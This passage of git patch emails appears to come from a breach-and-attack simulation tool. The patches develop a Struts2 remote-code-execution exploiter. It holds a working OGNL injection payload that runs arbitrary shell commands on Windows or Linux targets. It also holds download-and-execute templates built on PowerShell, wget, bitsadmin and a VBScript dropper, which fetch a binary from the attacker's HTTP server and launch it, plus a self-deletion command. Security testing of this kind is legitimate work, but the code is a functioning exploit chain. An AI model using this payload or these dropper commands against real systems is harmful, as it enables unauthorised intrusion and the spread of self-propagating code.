\ + "(#_memberAccess?" \ + "(#_memberAccess=#dm):" \ + "((#container=#context['com.opensymphony.xwork2.ActionContext.container'])." \ + "(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class))." \ + "(#ognlUtil.getExcludedPackageNames().clear())." \ + "(#ognlUtil.getExcludedClasses().clear())." \ + "(#context.setMemberAccess(#dm))))." \ + "(#cmd='%s')." \ + "(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win')))." \ + "(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd}))." \ + "(#p=new java.lang.ProcessBuilder(#cmds))." \ + "(#p.redirectErrorStream(true)).(#process=#p.start())." \ + "(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream()))." \ + "(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros))." \ + "(#ros.flush())}" % cmd # Turns payload ascii just for consistency if isinstance(payload, unicode): payload = unicodedata.normalize('NFKD', payload).encode('ascii', 'ignore') @@ -229,13 +222,26 @@ class Struts2Exploiter(HostExploiter): try: request = urllib2.Request(url, headers=headers) # Timeout added or else we would wait for all monkeys' output - page = urllib2.urlopen(request, timeout=timeout).read() + page = urllib2.urlopen(request).read() except AttributeError: # If url does not exist return False - except httplib.IncompleteRead, e: + except httplib.IncompleteRead as e: page = e.partial - except Exception: - LOG.info("Request timed out, because monkey is still running on remote host") return page + + @staticmethod + def get_exploitable_ports(host, port_list, names): + candidate_services = {} + for name in names: + chosen_services = { + service: host.services[service] for service in host.services if + ('name' in host.services[service]) and (host.services[service]['name'] == name) + } + candidate_services.update(chosen_services) + + valid_ports = [(port, candidate_services['tcp-' + str(port)]['data'][1]) for port in port_list if + 'tcp-' + str(port) in candidate_services] + + return valid_ports diff --git a/infection_monkey/model/__init__.py b/infection_monkey/model/__init__.py index 1296570e1..24fbf900e 100644 --- a/infection_monkey/model/__init__.py +++ b/infection_monkey/model/__init__.py @@ -4,6 +4,7 @@ __author__ = 'itamar' MONKEY_ARG = "m0nk3y" DROPPER_ARG = "dr0pp3r" +ID_STRING = "M0NK3Y3XPL0ITABLE" DROPPER_CMDLINE_WINDOWS = 'cmd /c %%(dropper_path)s %s' % (DROPPER_ARG, ) MONKEY_CMDLINE_WINDOWS = 'cmd /c %%(monkey_path)s %s' % (MONKEY_ARG, ) MONKEY_CMDLINE_LINUX = './%%(monkey_filename)s %s' % (MONKEY_ARG, ) @@ -14,3 +15,12 @@ MONKEY_CMDLINE_HTTP = 'cmd.exe /c "bitsadmin /transfer Update /download /priorit RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (MONKEY_ARG, ) RDP_CMDLINE_HTTP_VBS = 'set o=!TMP!\!RANDOM!.tmp&@echo Set objXMLHTTP=CreateObject("WinHttp.WinHttpRequest.5.1")>!o!&@echo objXMLHTTP.open "GET","%%(http_path)s",false>>!o!&@echo objXMLHTTP.send()>>!o!&@echo If objXMLHTTP.Status=200 Then>>!o!&@echo Set objADOStream=CreateObject("ADODB.Stream")>>!o!&@echo objADOStream.Open>>!o!&@echo objADOStream.Type=1 >>!o!&@echo objADOStream.Write objXMLHTTP.ResponseBody>>!o!&@echo objADOStream.Position=0 >>!o!&@echo objADOStream.SaveToFile "%%(monkey_path)s">>!o!&@echo objADOStream.Close>>!o!&@echo Set objADOStream=Nothing>>!o!&@echo End if>>!o!&@echo Set objXMLHTTP=Nothing>>!o!&@echo Set objShell=CreateObject("WScript.Shell")>>!o!&@echo objShell.Run "%%(monkey_path)s %s %%(parameters)s", 0, false>>!o!&start /b cmd /c cscript.exe //E:vbscript !o!^&del /f /q !o!' % (MONKEY_ARG, ) DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del /f /q %(file_path)s & if not exist %(file_path)s exit)) > NUL 2>&1' + +# Commands used for downloading monkeys +POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, ) +WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, ) +# Commands used to check for architecture and if machine is exploitable +CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING +CHECK_LINUX = "echo %s && lscpu" % ID_STRING +# Commands used to check if monkeys already exists +EXISTS = "ls %s" \ No newline at end of file From 671452243d9b36a663c6b50cfe39d6c9600dfcc6 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Mon, 25 Jun 2018 18:26:34 +0300 Subject: [PATCH 7/9] Fixed some bugs and more notes --- infection_monkey/exploit/struts2.py | 17 +++++++---------- infection_monkey/model/__init__.py | 3 +++ 2 files changed, 10 insertions(+), 10 deletions(-) diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py index bec717028..409a7f1ef 100644 --- a/infection_monkey/exploit/struts2.py +++ b/infection_monkey/exploit/struts2.py @@ -12,7 +12,7 @@ import logging from exploit import HostExploiter from exploit.tools import get_target_monkey, get_monkey_depth from tools import build_monkey_commandline, HTTPTools -from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, DROPPER_ARG +from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP_BITS_DROPPER __author__ = "VakarisZ" @@ -20,9 +20,6 @@ LOG = logging.getLogger(__name__) DOWNLOAD_TIMEOUT = 300 -RDP_CMDLINE_HTTP_BITS = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, ) - - class Struts2Exploiter(HostExploiter): _TARGET_OS_TYPE = ['linux', 'windows'] @@ -47,7 +44,8 @@ class Struts2Exploiter(HostExploiter): if port[1]: current_host = "https://%s:%s" % (self.host.ip_addr, port[0]) else: - current_host = "http://%s:%s" % (self.host.ip_addr, port[0]) + # TODO remove struts + current_host = "http://%s:%s/struts" % (self.host.ip_addr, port[0]) # Get full URL url = self.get_redirected(current_host) LOG.info("Trying to exploit with struts2") @@ -87,7 +85,7 @@ class Struts2Exploiter(HostExploiter): return False LOG.info("Started http server on %s", http_path) - cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) + cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path) command = WGET_HTTP % {'monkey_path': dropper_path, 'http_path': http_path, 'parameters': cmdline} @@ -135,12 +133,13 @@ class Struts2Exploiter(HostExploiter): return False LOG.info("Started http server on %s", http_path) - cmdline = build_monkey_commandline(self.host, get_monkey_depth() - 1) + # We need to double escape backslashes. Once for payload, twice for command + cmdline = re.sub(r"\\", r"\\\\", build_monkey_commandline(self.host, get_monkey_depth() - 1, dropper_path)) command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), 'http_path': http_path, 'parameters': cmdline} - backup_command = RDP_CMDLINE_HTTP_BITS % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), + backup_command = RDP_CMDLINE_HTTP_BITS_DROPPER % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), 'http_path': http_path, 'parameters': cmdline} resp = self.exploit(url, command) @@ -196,8 +195,6 @@ class Struts2Exploiter(HostExploiter): :param cmd: Code to try and execute on host :return: response """ - page = "" - payload = "%%{(#_='multipart/form-data')." \ "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)." \ "(#_memberAccess?" \ diff --git a/infection_monkey/model/__init__.py b/infection_monkey/model/__init__.py index 24fbf900e..4f0b22b27 100644 --- a/infection_monkey/model/__init__.py +++ b/infection_monkey/model/__init__.py @@ -19,8 +19,11 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del # Commands used for downloading monkeys POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, ) WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, ) +RDP_CMDLINE_HTTP_BITS_DROPPER = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, ) + # Commands used to check for architecture and if machine is exploitable CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING CHECK_LINUX = "echo %s && lscpu" % ID_STRING + # Commands used to check if monkeys already exists EXISTS = "ls %s" \ No newline at end of file From 6a37f2b95362d2cd57894fe3f818b27c246b2358 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Mon, 25 Jun 2018 19:11:58 +0300 Subject: [PATCH 8/9] removed debugging code --- infection_monkey/exploit/struts2.py | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py index 409a7f1ef..26322c10d 100644 --- a/infection_monkey/exploit/struts2.py +++ b/infection_monkey/exploit/struts2.py @@ -44,8 +44,7 @@ class Struts2Exploiter(HostExploiter): if port[1]: current_host = "https://%s:%s" % (self.host.ip_addr, port[0]) else: - # TODO remove struts - current_host = "http://%s:%s/struts" % (self.host.ip_addr, port[0]) + current_host = "http://%s:%s" % (self.host.ip_addr, port[0]) # Get full URL url = self.get_redirected(current_host) LOG.info("Trying to exploit with struts2") From c278b0a29c7ce0c27a7a88c70fc6240ccd654851 Mon Sep 17 00:00:00 2001 From: Vakaris Date: Tue, 26 Jun 2018 18:03:31 +0300 Subject: [PATCH 9/9] Small changes --- infection_monkey/exploit/struts2.py | 9 ++++++--- infection_monkey/model/__init__.py | 2 +- 2 files changed, 7 insertions(+), 4 deletions(-) diff --git a/infection_monkey/exploit/struts2.py b/infection_monkey/exploit/struts2.py index 26322c10d..3a08d0487 100644 --- a/infection_monkey/exploit/struts2.py +++ b/infection_monkey/exploit/struts2.py @@ -12,7 +12,8 @@ import logging from exploit import HostExploiter from exploit.tools import get_target_monkey, get_monkey_depth from tools import build_monkey_commandline, HTTPTools -from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP_BITS_DROPPER +from model import CHECK_LINUX, CHECK_WINDOWS, POWERSHELL_HTTP, WGET_HTTP, EXISTS, ID_STRING, RDP_CMDLINE_HTTP, \ + DROPPER_ARG __author__ = "VakarisZ" @@ -71,6 +72,7 @@ class Struts2Exploiter(HostExploiter): LOG.info("Host is exploitable with struts2 RCE vulnerability") # If monkey already exists and option not to exploit in that case is selected if self.skip_exist and self.check_remote_file(url, dropper_path): + LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True src_path = get_target_monkey(self.host) @@ -114,6 +116,7 @@ class Struts2Exploiter(HostExploiter): if self.skip_exist: for dropper_path in dropper_paths: if self.check_remote_file(url, re.sub(r"\\", r"\\\\", dropper_path)): + LOG.info("Host %s was already infected under the current configuration, done" % self.host) return True src_path = get_target_monkey(self.host) @@ -138,8 +141,8 @@ class Struts2Exploiter(HostExploiter): command = POWERSHELL_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), 'http_path': http_path, 'parameters': cmdline} - backup_command = RDP_CMDLINE_HTTP_BITS_DROPPER % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), - 'http_path': http_path, 'parameters': cmdline} + backup_command = RDP_CMDLINE_HTTP % {'monkey_path': re.sub(r"\\", r"\\\\", dropper_path), + 'http_path': http_path, 'parameters': cmdline, 'type': DROPPER_ARG} resp = self.exploit(url, command) diff --git a/infection_monkey/model/__init__.py b/infection_monkey/model/__init__.py index 4f0b22b27..a2a1e18bb 100644 --- a/infection_monkey/model/__init__.py +++ b/infection_monkey/model/__init__.py @@ -19,7 +19,7 @@ DELAY_DELETE_CMD = 'cmd /c (for /l %%i in (1,0,2) do (ping -n 60 127.0.0.1 & del # Commands used for downloading monkeys POWERSHELL_HTTP = "powershell -NoLogo -Command \"Invoke-WebRequest -Uri \\\'%%(http_path)s\\\' -OutFile \\\'%%(monkey_path)s\\\' -UseBasicParsing; %%(monkey_path)s %s %%(parameters)s\"" % (DROPPER_ARG, ) WGET_HTTP = "wget -O %%(monkey_path)s %%(http_path)s && chmod +x %%(monkey_path)s && %%(monkey_path)s %s %%(parameters)s" % (DROPPER_ARG, ) -RDP_CMDLINE_HTTP_BITS_DROPPER = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %s %%(parameters)s' % (DROPPER_ARG, ) +RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %%(http_path)s %%(monkey_path)s&&start /b %%(monkey_path)s %%(type)s %%(parameters)s' # Commands used to check for architecture and if machine is exploitable CHECK_WINDOWS = "echo %s && wmic os get osarchitecture" % ID_STRING